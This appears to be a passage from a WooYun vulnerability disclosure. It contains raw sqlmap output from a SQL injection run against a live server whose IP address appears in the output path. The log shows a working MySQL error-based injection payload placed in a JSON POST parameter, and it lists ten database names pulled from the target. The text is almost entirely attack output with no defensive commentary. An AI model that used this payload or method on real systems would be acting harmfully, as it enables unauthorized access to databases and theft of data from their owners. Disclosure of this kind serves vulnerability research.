WooYun.org

(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the oth
ers (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 40 HTTP(s) re
quests:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: {"area_equals":"","city_equals":"","title_equals":"","username_like
":"' AND (SELECT 3255 FROM(SELECT COUNT(*),CONCAT(0x71707a7871,(SELECT (ELT(3255
=3255,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SET
S GROUP BY x)a) AND 'rNlG'='rNlG","phonenum_equals":"","enabled_equals":null}
---
[14:22:37] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[14:22:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[14:22:37] [INFO] fetching database names
[14:22:37] [INFO] the SQL query used returns 10 entries
[14:22:37] [INFO] starting 10 threads
[14:22:38] [INFO] retrieved: mysql
[14:22:38] [INFO] retrieved: test
[14:22:38] [INFO] retrieved: oms_dev
[14:22:38] [INFO] retrieved: mlm_dev
[14:22:38] [INFO] retrieved: information_schema
[14:22:38] [INFO] retrieved: crm_dev
[14:22:38] [INFO] retrieved: pms_dev
[14:22:38] [INFO] retrieved: yqc
[14:22:38] [INFO] retrieved: yqc_test
[14:22:38] [INFO] retrieved: yqc_initdata
available databases [10]:
[*] crm_dev
[*] information_schema
[*] mlm_dev
[*] mysql
[*] oms_dev
[*] pms_dev
[*] test
[*] yqc
[*] yqc_initdata
[*] yqc_test
[14:22:38] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[14:22:38] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\121.40.218.177'
[*] shutting down at 14:22:38